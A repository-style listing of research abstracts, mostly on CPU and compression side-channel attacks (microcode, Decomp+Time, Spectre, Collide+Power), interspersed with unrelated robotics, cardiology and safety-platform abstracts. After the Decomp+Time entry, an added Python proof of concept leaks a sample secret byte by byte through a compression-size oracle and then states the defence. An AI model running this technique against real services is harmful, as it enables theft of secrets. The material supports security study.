
    Evaluation of an indoor localization system for a mobile robot

    Although indoor localization has been a widely researched topic, the results obtained may not meet the requirements of some domains. Most approaches cannot precisely localize a fast-moving object even with a complex installation, which complicates their use in the automated driving domain. In this publication, common technologies were analyzed and a commercial product, Marvelmind Indoor GPS, which combines ultrasound and radio-frequency communication, was chosen for our use case. The evaluation is first carried out in small indoor scenarios with static and moving objects. Further tests were done over wider areas, where the system is integrated into our Robot Operating System (ROS)-based, self-developed 'Smart PhysIcal Demonstration and evaluation Robot (SPIDER)', and the results of these outdoor tests are compared with the localization obtained from the GPS installed on the robot. Finally, the next steps to improve the results in further developments are discussed.

    NetSpectre

    CustomProcessingUnit: Reverse Engineering and Customization of Intel Microcode

    Microcode provides an abstraction layer over the instruction set to decompose complex instructions into simpler micro-operations that can be more easily implemented in hardware. It is an essential optimization to simplify the design of x86 processors. However, introducing an additional layer of software beneath the instruction set poses security and reliability concerns. The microcode details are confidential to the manufacturers, preventing independent auditing or customization of the microcode. Moreover, microcode patches are signed and encrypted to prevent unauthorized patching and reverse engineering. However, recent research has recovered decrypted microcode and reverse-engineered read/write debug mechanisms on Intel Goldmont (Atom), making analysis and customization of microcode possible on a modern Intel microarchitecture. In this work, we present the first framework for static and dynamic analysis of Intel microcode. Building upon prior research, we reverse-engineer Goldmont microcode semantics and reconstruct the patching primitives for microcode customization. For static analysis, we implement a Ghidra processor module for decompilation and analysis of decrypted microcode. For dynamic analysis, we create a UEFI application that can trace and patch microcode to provide complete microcode control on Goldmont systems. Leveraging our framework, we reverse-engineer the confidential Intel microcode update algorithm and perform the first security analysis of its design and implementation. In three further case studies, we illustrate the potential security and performance benefits of microcode customization: we provide the first x86 Pointer Authentication Code (PAC) microcode implementation and its security evaluation, design and implement fast software breakpoints that are more than 1000x faster than standard breakpoints, and present constant-time microcode division.

    Practical Timing Side-Channel Attacks on Memory Compression

    Compression algorithms have side channels due to their data-dependent operations. So far, only the compression-ratio side channel, i.e., the compressed data size, has been exploited. In this paper, we present Decomp+Time, the first memory compression attack exploiting a timing side channel in compression algorithms. While Decomp+Time affects a much broader set of applications than prior work, a key challenge is precisely crafting attacker-controlled compression payloads to enable the attack with sufficient resolution. We develop an evolutionary fuzzer, Comprezzor, to find effective Decomp+Time payloads that maximize latency differences; the payloads it finds are effective enough that decompression timing can even be exploited in remote Decomp+Time attacks across the Internet. Decomp+Time has a capacity of 9.73 kB/s locally and 10.72 bit/min across the Internet (14 hops, > 700 miles). Using Comprezzor, we develop attacks that leak data byte by byte in four case studies: First, we leak 1.50 bit/min from Memcached on a remote server running a PHP application. Second, we leak database records at 2.69 bit/min from PostgreSQL, managed by a Python-Flask application, over the Internet. Third, we leak secrets at 49.14 bit/min locally from ZRAM-compressed pages on Linux. Fourth, we leak internal heap pointers from the V8 engine within the Google Chrome browser on a system using ZRAM. This highlights the importance of re-evaluating the use of compression on sensitive data even if the application is only reachable via a remote interface.
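    The compression-ratio side channel that the abstract names as the previously exploited one, as an added example (not code from the Decomp+Time paper): a secret and an attacker-controlled string share one DEFLATE stream, and the attacker recovers the secret one byte at a time purely from the compressed size. The page body, the secret value and the alphabet are constructed for this demo; Z_FIXED and the padding sum are choices made here to keep the size oracle deterministic, not part of the paper's method. Decomp+Time replaces this size oracle with decompression latency, which is why it reaches applications where the size does not change.

```python
import zlib

# Constructed sample: a response that carries a secret next to a reflected,
# attacker-controlled value.  Secret, layout and alphabet are made up here.
SECRET_PREFIX = b"secret="
SECRET_VALUE = b"7f3a9c"
ALPHABET = b"0123456789abcdef"


def build_body(attacker_input: bytes) -> bytes:
    """Server-side page: the secret first, then the reflected attacker input."""
    return SECRET_PREFIX + SECRET_VALUE + b";guess=" + attacker_input


def compressed_len(data: bytes) -> int:
    """Byte length of raw DEFLATE output for `data`.

    Z_FIXED pins the Huffman tables, so the only thing that differs between
    two bodies is the LZ77 parse.  That is a demo choice for determinism;
    real servers use dynamic tables, which add noise but not immunity.
    """
    c = zlib.compressobj(9, zlib.DEFLATED, -15, 9, zlib.Z_FIXED)
    return len(c.compress(data) + c.flush())


def size_oracle(attacker_input: bytes) -> int:
    """What a network observer sees: the compressed size of the response.

    Extending an LZ77 match by one byte (correct guess) instead of emitting a
    literal (wrong guess) saves only a few *bits*, which a byte count often
    hides.  Appending 0..7 distinct bytes >= 0x90 (each a 9-bit literal under
    fixed Huffman) walks the stream's bit offset through every residue mod 8;
    the sum of the eight byte lengths is then strictly monotone in the true
    bit count, so the correct guess is always the unique minimum.
    """
    total = 0
    for k in range(8):
        pad = bytes(range(0x90, 0x90 + k))
        total += compressed_len(build_body(attacker_input + pad))
    return total


def leak_secret(length: int = len(SECRET_VALUE)) -> bytes:
    """Recover the secret byte by byte using nothing but the size oracle."""
    known = b""
    for _ in range(length):
        # Candidate bodies differ only in the last guessed byte; the one that
        # continues the real secret yields the longest match and smallest size.
        best = min(ALPHABET, key=lambda c: size_oracle(SECRET_PREFIX + known + bytes([c])))
        known += bytes([best])
    return known


if __name__ == "__main__":
    print(leak_secret().decode())
```

    The defence is the same as for the timing variant: never compress attacker-controlled input in the same stream as a secret, or pad and rate-limit the response so that the oracle loses resolution.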

    Systematic analysis of programming languages and their execution environments for spectre attacks

    In this paper, we analyze the security of programming languages and their execution environments (compilers and interpreters) with respect to Spectre attacks. The analysis shows that only 16 out of 42 execution environments have mitigations against at least one Spectre variant, i.e., 26 have no mitigations against any Spectre variant. Using our novel tool Speconnector, we develop Spectre proof-of-concept attacks in 8 programming languages and on code generated by 11 execution environments that were previously not known to be affected. Our results highlight some programming languages that are used to implement security-critical code but remain entirely unprotected, even three years after the discovery of Spectre.

    Cardiac power output accurately reflects external cardiac work over a wide range of inotropic states in pigs

    BACKGROUND: Cardiac power output (CPO), derived from the product of cardiac output and mean aortic pressure, is an important yet underexploited parameter for hemodynamic monitoring of critically ill patients in the intensive-care unit (ICU). The conductance catheter-derived pressure-volume loop area reflects left ventricular stroke work (LV SW). Dividing LV SW by time, a measure of LV SW min⁻¹ is obtained sharing the same unit as CPO (W). We aimed to validate CPO as a marker of LV SW min⁻¹ under various inotropic states. METHODS: We retrospectively analysed data obtained from experimental studies of the hemodynamic impact of mild hypothermia and hyperthermia on acute heart failure. Fifty-nine anaesthetized and mechanically ventilated closed-chest Landrace pigs (68 ± 1 kg) were instrumented with Swan-Ganz and LV pressure-volume catheters. Data were obtained at body temperatures of 33.0 °C, 38.0 °C and 40.5 °C; before and after: resuscitation, myocardial infarction, endotoxemia, sevoflurane-induced myocardial depression and beta-adrenergic stimulation. We plotted LV SW min⁻¹ against CPO by linear regression analysis, as well as against the following classical indices of LV function and work: LV ejection fraction (LV EF), rate-pressure product (RPP), triple product (TP), LV maximum pressure (LVPmax) and maximal rate of rise of LVP (LV dP/dtmax). RESULTS: CPO showed the best correlation with LV SW min⁻¹ (r² = 0.89; p < 0.05) while LV EF did not correlate at all (r² = 0.01; p = 0.259). Further parameters correlated moderately with LV SW min⁻¹ (LVPmax r² = 0.47, RPP r² = 0.67; and TP r² = 0.54). LV dP/dtmax correlated worst with LV SW min⁻¹ (r² = 0.28). CONCLUSION: CPO reflects external cardiac work over a wide range of inotropic states. These data further support the use of CPO to monitor inotropic interventions in the ICU.

    Collide+Power: Leaking Inaccessible Data with Software-based Power Side Channels

    Differential Power Analysis (DPA) measures single-bit differences between data values used in computer systems by statistical analysis of power traces. In this paper, we show that the mere co-location of data values, e.g., attacker and victim data in the same buffers and caches, leads to power leakage in modern CPUs that depends on a combination of both values, resulting in a novel attack, Collide+Power. We systematically analyze the power leakage of the CPU's memory hierarchy to derive precise leakage models enabling practical end-to-end attacks. These attacks can be conducted in software with any signal related to power consumption, e.g., power-consumption interfaces or throttling-induced timing variations. Leakage due to throttling requires 133.3 times more samples than direct power measurements. We develop a novel differential measurement technique that amplifies the exploitable leakage by a factor of 8.778 on average compared to a straightforward DPA approach. We demonstrate that Collide+Power leaks single-bit differences from the CPU's memory hierarchy with fewer than 23000 measurements. In our end-to-end DPA attacks, Collide+Power varies the attacker-controlled data that is co-located with the victim's. We present a Meltdown-style attack, leaking from attacker-chosen memory locations, and a faster MDS-style attack, which leaks 4.82 bit/h. Collide+Power is a generic attack applicable to any modern CPU, arbitrary memory locations, and victim applications and data. However, the Meltdown-style attack is not yet practical, as it is limited by the state of the art in prefetching victim data into the cache, leading to an unrealistic real-world attack runtime with throttling of more than a year for a single bit. Given the different variants and potentially more practical prefetching methods, we consider Collide+Power a relevant threat that is challenging to mitigate.

    SELENE: Self-Monitored Dependable Platform for High-Performance Safety-Critical Systems.

    © 2020 IEEE. Personal use of this material is permitted. Permission from IEEE must be obtained for all other uses, in any current or future media, including reprinting/republishing this material for advertising or promotional purposes, creating new collective works, for resale or redistribution to servers or lists, or reuse of any copyrighted component of this work in other works.
    Existing HW/SW platforms for safety-critical systems suffer from limited performance and/or from a lack of flexibility due to building on specific proprietary components. This jeopardizes their wide deployment across domains. While some research has been done to overcome these limitations, it has had limited success owing to missing flexibility and extensibility. Flexibility and extensibility are the cornerstones of industry adoption: industries dealing in capital goods need technologies on which they can rely for decades (e.g. avionics, space, automotive). SELENE aims at covering this gap by proposing a new family of safety-critical computing platforms, which builds upon open source components such as the RISC-V instruction set architecture, GNU/Linux, and the Jailhouse hypervisor. SELENE will develop an advanced computing platform that is able to: (1) adapt the system to the specific requirements of different application domains, to changing environmental conditions, and to internal conditions of the system itself; (2) allow the integration of applications of different criticalities and performance demands on the same platform, guaranteeing functional and temporal isolation properties; (3) achieve flexible diverse redundancy by exploiting the inherent redundant capabilities of the multicore; and (4) efficiently execute compute-intensive applications by means of specific accelerators.
    This work has received funding from the European Union's Horizon 2020 research and innovation programme under grant agreement no. 871467.
    Hernández Luz, C.; Flich Cardo, J.; Paredes Palacios, R.; Lefebvre, C.; Allende, I.; Abella, J.; Trilla, D.... (2020). SELENE: Self-Monitored Dependable Platform for High-Performance Safety-Critical Systems. IEEE. 370-377. https://doi.org/10.1109/DSD51259.2020.00066